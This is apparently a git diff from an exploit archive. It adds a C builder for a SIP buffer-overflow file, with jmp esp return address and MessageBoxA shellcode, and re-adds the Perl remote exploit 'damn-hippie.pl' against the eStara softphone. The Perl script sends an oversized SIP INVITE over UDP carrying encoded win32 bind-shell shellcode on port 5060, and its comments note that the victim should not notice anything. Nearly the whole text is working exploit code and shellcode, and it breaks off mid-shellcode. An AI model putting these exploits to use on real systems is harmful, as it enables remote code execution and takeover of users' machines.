0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 
0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 
0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61 +}; + +unsigned char jmpesp[] ={ //jmpesp=0x7ffa4512; + 0x12, 0x45, 0xfa, 0x7f +}; + +unsigned char end[] = { + 0x32, 0x33, 0x34, 0x35, 0x36, + 0x37, 0x38, 0x39, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x31, 0x32, + 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, + 0x39, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x31, 0x32, 0x33, 0x34, + 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, + 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x3A, 0x30, 0x20, 0x50, 0x43, 0x4D, 0x55, 0x2F, + 0x38, 0x30, 0x30, 0x30, 0x0D, 0x0A +}; + + + +unsigned char scode[] = +"\xB8" +"\x75\xC1\xe4\x88" //Address of MessageBoxA + 0x11111111 +"\x2D\x11\x11\x11\x11\x50\x59\x33\xc0\x50\x68" +"\x68\x61\x63\x6b" //"hack" +"\x54\x5a\x50\x52\x52\x50\x53\x51\xc3"; + +//Shellcode: +//B8 75C1e488 MOV EAX,88e4C175 ; MessageBoxA + 0x11111111 to +//2D 11111111 SUB EAX,11111111 ; Make characters readable +//50 PUSH EAX ; xchg registers : eax = 77D3b064 +//59 POP ECX ; Offset to API. 
+//33C0 XOR EAX,EAX ; Create Null
+//50 PUSH EAX ; Put ascii0 end of string
+//68 6861636b PUSH 6b636168 ; Create string.= hack
+//54 PUSH ESP ; Get the offset to the
+//5A POP EDX ; Message String
+//MessageBox call
+//50 PUSH EAX ; Null Pointer
+//52 PUSH EAX ; Message
+//52 PUSH EDX ; Message
+//50 PUSH EAX ; Null Pointer
+//53 PUSH EBX ; Return address: 0x00000000
+//51 PUSH ECX ; Address of MessageBoxA
+//C3 RETN ; Jump
+
+
+int main()
+{
+ FILE *stream;
+ unsigned char *exploitbuf;
+ int size;
+ char *filename = "sip_overbuf_exploit.dat";
+ DWORD msgboxaddr = (DWORD)MessageBoxA; //Windows XP EN SP2 MessageBoxA address = 0x77d6e824;
+ //If others, just change it;
+
+ size = sizeof(invite)+sizeof(jmpesp)+sizeof(end);
+ exploitbuf = (unsigned char *)malloc(size);
+ printf("exploitbuf len = %d\n", size);
+ memcpy(exploitbuf, invite, sizeof(invite));
+ memcpy(exploitbuf+sizeof(invite), jmpesp, sizeof(jmpesp));
+ memcpy(exploitbuf+sizeof(invite)+sizeof(jmpesp), end, sizeof(end));
+ *(DWORD *)&scode[1] = msgboxaddr+0x11111111;
+ memcpy(exploitbuf+sizeof(invite)+sizeof(jmpesp), scode, sizeof(scode));
+
+
+ if( (stream = fopen( filename, "w+b" )) == NULL )
+ printf("Build File Error!!!\n");
+ else
+ printf("Build File %s successful! ^_^\n", filename);
+
+ free(exploitbuf);
+ fwrite( exploitbuf, size, 1, stream );
+ fclose(stream);
+}
+
+// milw0rm.com [2006-01-12]
diff --git a/platforms/windows/remote/1414.pl b/platforms/windows/remote/1414.pl
index bfd02f033..a1f8e7925 100755
--- a/platforms/windows/remote/1414.pl
+++ b/platforms/windows/remote/1414.pl
@@ -1,93 +1,93 @@
-#!/usr/bin/perl -s
-# damn-hippie.pl by kokanin (google estara, it shows sip stuff and a hippie)
-# Remote "estara softphone" exploit, executable version info = 3.0.1.2
-# kokanin did the research, metasploit.com did the encoded bindshell on tcp/5060
-# Lets face it, most users wont know the difference between tcp and udp even if
-# if it bites them in the ass, so the port is chosen in the hope that nat'ed
-# users forward both tcp and udp port 5060 to their machine to make sip stuff
-# work without all that hard thinking taking place.
-
-# this used to be 0day, but I saw someone release something called estara.c
-# on packetstorm today. I don't know if it's even the same bug, but this
-# exploit is better anyway, so there.
-
-# win32_bind, \x00\x0a\x0d encoded, [ EXITFUNC=thread LPORT=5060 Size=399 ]
-# again, provided by http://metasploit.com (facing more stuff, I wouldn't know
-# how to write win32 shellcode even if someone bit me in the ass :)
-# since the shellcode exits the thread the user should not notice anything.
-
-use IO::Socket;
-if(!$ARGV[0])
-{ print "I am private, do not use me. Tell kokanin how you got me\n"; exit(-1); }
-my $ret = pack("l",0x0303DCDF); # jmp di in softphone.exe, seems stable
-my $buflen = 4099;
-
-my $shellcode =
-"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x08\xb3".
-"\x06\x82\x83\xeb\xfc\xe2\xf4\xf4\x5b\x50\x82\x08\xb3\x55\xd7\x5e".
-"\xe4\x8d\xee\x2c\xab\x8d\xc7\x34\x38\x52\x87\x70\xb2\xec\x09\x42".
-"\xab\x8d\xd8\x28\xb2\xed\x61\x3a\xfa\x8d\xb6\x83\xb2\xe8\xb3\xf7".
-"\x4f\x37\x42\xa4\x8b\xe6\xf6\x0f\x72\xc9\x8f\x09\x74\xed\x70\x33".
-"\xcf\x22\x96\x7d\x52\x8d\xd8\x2c\xb2\xed\xe4\x83\xbf\x4d\x09\x52".
-"\xaf\x07\x69\x83\xb7\x8d\x83\xe0\x58\x04\xb3\xc8\xec\x58\xdf\x53".
-"\x71\x0e\x82\x56\xd9\x36\xdb\x6c\x38\x1f\x09\x53\xbf\x8d\xd9\x14".
-"\x38\x1d\x09\x53\xbb\x55\xea\x86\xfd\x08\x6e\xf7\x65\x8f\x45\x89".
-"\x5f\x06\x83\x08\xb3\x51\xd4\x5b\x3a\xe3\x6a\x2f\xb3\x06\x82\x98".
-"\xb2\x06\x82\xbe\xaa\x1e\x65\xac\xaa\x76\x6b\xed\xfa\x80\xcb\xac".
-"\xa9\x76\x45\xac\x1e\x28\x6b\xd1\xba\xf3\x2f\xc3\x5e\xfa\xb9\x5f".
-"\xe0\x34\xdd\x3b\x81\x06\xd9\x85\xf8\x26\xd3\xf7\x64\x8f\x5d\x81".
-"\x70\x8b\xf7\x1c\xd9\x01\xdb\x59\xe0\xf9\xb6\x87\x4c\x53\x86\x51".
-"\x3a\x02\x0c\xea\x41\x2d\xa5\x5c\x4c\x31\x7d\x5d\x83\x37\x42\x58".
-"\xe3\x56\xd2\x48\xe3\x46\xd2\xf7\xe6\x2a\x0b\xcf\x82\xdd\xd1\x5b".
-"\xdb\x04\x82\x1b\x77\x8f\x62\x62\xa3\x56\xd5\xf7\xe6\x22\xd1\x5f".
-"\x4c\x53\xaa\x5b\xe7\x51\x7d\x5d\x93\x8f\x45\x60\xf0\x4b\xc6\x08".
-"\x3a\xe5\x05\xf2\x82\xc6\x0f\x74\x97\xaa\xe8\x1d\xea\xf5\x29\x8f".
-"\x49\x85\x6e\x5c\x75\x42\xa6\x18\xf7\x60\x45\x4c\x97\x3a\x83\x09".
-"\x3a\x7a\xa6\x40\x3a\x7a\xa6\x44\x3a\x7a\xa6\x58\x3e\x42\xa6\x18".
-"\xe7\x56\xd3\x59\xe2\x47\xd3\x41\xe2\x57\xd1\x59\x4c\x73\x82\x60".
-"\xc1\xf8\x31\x1e\x4c\x53\x86\xf7\x63\x8f\x64\xf7\xc6\x06\xea\xa5".
-"\x6a\x03\x4c\xf7\xe6\x02\x0b\xcb\xd9\xf9\x7d\x3e\x4c\xd5\x7d\x7d".
-"\xb3\x6e\x6d\xc6\x53\x66\x7d\x5d\xb7\x37\x59\x5b\x4c\xd6\x82";
-
-my $buffer = "\x90" x ($buflen - length($shellcode)) . $shellcode;
-
-my $sipinvite =
-
-"INVITE sip:snotboble\@solgryn.fi.st SIP/2.0\r\n".
-"Via: SIP/2.0/UDP abcdabcd.fi.st:1234;branch=somebranchidhere\r\n".
-"From: 2448 ;tag=2448\r\n".
-"To: Receiver \r\n".
-"Call-ID: 0\@abcdabcd.fi.st\r\n".
-"CSeq: 1 INVITE\r\n".
-"Contact: 2448 \r\n".
-"Expires: 1200\r\n".
-"Max-Forwards: 70\r\n".
-"Content-Type: application/sdp\r\n".
-"Content-Length: 4234\r\n".
-"\r\n".
-$buffer .
-"=0\r\n".
-"o=2448 2448 2448 IN IP4 " . $ret . "DCBA.fi.st\r\n".
-"s=Session SDP\r\n".
-"c=IN IP4 123.123.12.34\r\n".
-"t=0 0\r\n".
-"m=audio 9876 RTP/AVP 0\r\n".
-"a=rtpmap:0 PCMU/8000\r\n".
-"\r\n";
-$host = $ARGV[0];
-$port = 5060;
-
-$socket = new IO::Socket::INET
-(
-Proto => "udp",
-PeerAddr => $host,
-PeerPort => $port,
-);
-
-die "unable to connect to $host:$port ($!)\n" unless $socket;
-
-print $socket $sipinvite;
-
-close($socket);
-
-# milw0rm.com [2006-01-12]
+#!/usr/bin/perl -s
+# damn-hippie.pl by kokanin (google estara, it shows sip stuff and a hippie)
+# Remote "estara softphone" exploit, executable version info = 3.0.1.2
+# kokanin did the research, metasploit.com did the encoded bindshell on tcp/5060
+# Lets face it, most users wont know the difference between tcp and udp even if
+# if it bites them in the ass, so the port is chosen in the hope that nat'ed
+# users forward both tcp and udp port 5060 to their machine to make sip stuff
+# work without all that hard thinking taking place.
+
+# this used to be 0day, but I saw someone release something called estara.c
+# on packetstorm today. I don't know if it's even the same bug, but this
+# exploit is better anyway, so there.
+
+# win32_bind, \x00\x0a\x0d encoded, [ EXITFUNC=thread LPORT=5060 Size=399 ]
+# again, provided by http://metasploit.com (facing more stuff, I wouldn't know
+# how to write win32 shellcode even if someone bit me in the ass :)
+# since the shellcode exits the thread the user should not notice anything.
+
+use IO::Socket;
+if(!$ARGV[0])
+{ print "I am private, do not use me. Tell kokanin how you got me\n"; exit(-1); }
+my $ret = pack("l",0x0303DCDF); # jmp di in softphone.exe, seems stable
+my $buflen = 4099;
+
+my $shellcode =
+"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x08\xb3".
+"\x06\x82\x83\xeb\xfc\xe2\xf4\xf4\x5b\x50\x82\x08\xb3\x55\xd7\x5e".
+"\xe4\x8d\xee\x2c\xab\x8d\xc7\x34\x38\x52\x87\x70\xb2\xec\x09\x42".
+"\xab\x8d\xd8\x28\xb2\xed\x61\x3a\xfa\x8d\xb6\x83\xb2\xe8\xb3\xf7".
+"\x4f\x37\x42\xa4\x8b\xe6\xf6\x0f\x72\xc9\x8f\x09\x74\xed\x70\x33".
+"\xcf\x22\x96\x7d\x52\x8d\xd8\x2c\xb2\xed\xe4\x83\xbf\x4d\x09\x52".
+"\xaf\x07\x69\x83\xb7\x8d\x83\xe0\x58\x04\xb3\xc8\xec\x58\xdf\x53".
+"\x71\x0e\x82\x56\xd9\x36\xdb\x6c\x38\x1f\x09\x53\xbf\x8d\xd9\x14".
+"\x38\x1d\x09\x53\xbb\x55\xea\x86\xfd\x08\x6e\xf7\x65\x8f\x45\x89".
+"\x5f\x06\x83\x08\xb3\x51\xd4\x5b\x3a\xe3\x6a\x2f\xb3\x06\x82\x98".
+"\xb2\x06\x82\xbe\xaa\x1e\x65\xac\xaa\x76\x6b\xed\xfa\x80\xcb\xac".
